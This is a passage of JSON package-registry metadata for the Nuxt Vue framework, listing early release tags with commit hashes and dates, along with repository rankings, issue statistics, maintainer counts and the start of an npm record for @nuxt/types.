sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2026-02-13T18:02:57.623Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":1,"rankings":{"downloads":null,"dependent_repos_count":4.8023661777224,"dependent_packages_count":8.379904349506738,"stargazers_count":0.020149931942576808,"forks_count":0.08604843385682034,"docker_downloads_count":null,"average":3.3221172232571337},"purl":"pkg:golang/github.com/nuxt/nuxt","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/nuxt/nuxt","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/nuxt/nuxt","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/nuxt/nuxt/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs","https://github.com/sponsors/nuxt"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T18:00:30.319Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":321,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fnuxt%2Fnuxt/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fnuxt%2Fnuxt/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fnuxt%2Fnuxt/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fnuxt%2Fnuxt/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fnuxt%2Fnuxt/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fnuxt%2Fnuxt/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2133595,"maintainers_count":0,"namespaces_count":782439,"keywords_count":112823,"github":"golang","metadata":{"funded_packages_count":53495},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-04-19T05:14:45.920Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":1096128,"name":"@nuxt/types","ecosystem":"npm","description":"Nuxt types","homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":91,"first_release_published_at":"2019-07-05T13:31:36.223Z","latest_release_published_at":"2024-06-28T11:34:40.085Z","latest_release_number":"2.18.1","last_synced_at":"2026-05-10T21:31:24.621Z","created_at":"2022-04-08T10:39:33.536Z","updated_at":"2026-05-10T21:31:24.621Z","registry_url":"https://www.npmjs.com/package/@nuxt/types","install_command":"npm install @nuxt/types","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"2x":"2.16.2","latest":"2.18.1"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2024-10-29T20:55:49.000Z","size":114898,"stargazers_count":54703,"open_issues_count":872,"forks_count":5004,"subscribers_count":793,"default_branch":"main","last_synced_at":"2024-10-29T21:25:05.500Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-10-29T18:14:58.000Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121833,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue 